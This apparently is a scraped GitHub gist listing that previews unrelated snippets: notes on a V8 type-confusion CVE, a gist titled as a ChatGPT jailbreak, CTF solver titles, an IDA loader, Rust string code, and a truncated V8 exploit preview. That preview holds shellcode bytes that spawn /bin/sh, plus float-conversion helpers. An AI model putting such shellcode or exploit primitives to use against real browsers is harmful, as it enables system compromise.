test.js
var arr = new Array(1.1, 2.2, 3.3);
function test(obj) {
arr[0] = obj;
}
test({});Print bytecode of test function:
mistymntncop
/ notes 4 Alex Chapman.md
Last active
November 5, 2023 01:21
MaxBWMinRTT
/ writeup.md
Last active
November 3, 2023 08:44
Some quick notes about the CVE-2023-3079(V8 type confusion), no PoC yet.
Official patch: https://chromium-review.googlesource.com/c/v8/v8/+/4584248
Patch come from KeyedStoreIC::StoreElementHandler(), it returns fast path code(Turbofan builtin) for keyed store depends on "receiver_map" and "store_mode". Based on the content of this function is all about element STORE, I personally believe that this is an OOB writes vulnerability.
If we divide the PoC exploration into two parts based on this func, they are:
coolaj86
/ ChatGPT-Dan-Jailbreak.md
Last active
June 29, 2024 16:42
d0now
/ 2022-LINE-CTF-IPCHandler.md
Last active
August 23, 2022 06:20
LINE CTF 2022 - "IPC Handler" solver code
- yoyoyoyo
gamozolabs
/ proc_mem.py
Last active
June 19, 2024 07:09
IDA Python loader for /proc/pid/mem without debugging a process
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re, subprocess, idaapi, ida_segment, ida_kernwin | |
| # To install this, simply put it in your ida_install/loaders folder and open | |
| # a `/proc/<pid>/mem` file! | |
| # | |
| # You might need to set `echo 0 > /proc/sys/kernel/yama/ptrace_scope` if you | |
| # want to be able to dump processes depending on your system configuration. | |
| # Check if the file is supported by our loader | |
| def accept_file(li, filename): |
vngkv123
/ TFC2021-Chrome-V8.mjs
Last active
November 5, 2021 06:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import * as module from "1.mjs"; | |
| /* | |
| => 1.mjs | |
| export let x = {}; | |
| export let y = {}; | |
| export let z = {}; | |
| */ | |
| var f64 = new Float64Array(1); |
The CTREE is built from the optimized microcode (maturity at CMAT_FINAL), it represents an AST-like tree with C statements and expressions. It can be printed as C code.
jimmychu0807
/ string-conversion.rs
Created
November 21, 2019 10:20
Conversion between String, str, Vec<u8>, Vec<char> in Rust
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use std::str; | |
| fn main() { | |
| // -- FROM: vec of chars -- | |
| let src1: Vec<char> = vec!['j','{','"','i','m','m','y','"','}']; | |
| // to String | |
| let string1: String = src1.iter().collect::<String>(); | |
| // to str | |
| let str1: &str = &src1.iter().collect::<String>(); | |
| // to vec of byte |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5]; | |
| let conva = new ArrayBuffer(8) | |
| let convi = new Uint32Array(conva); | |
| let convf = new Float64Array(conva); | |
| function i2f(i) { | |
| convi[0] = i%0x100000000; | |
| convi[1] = i/0x100000000; | |
| return convf[0]; |
NewerOlder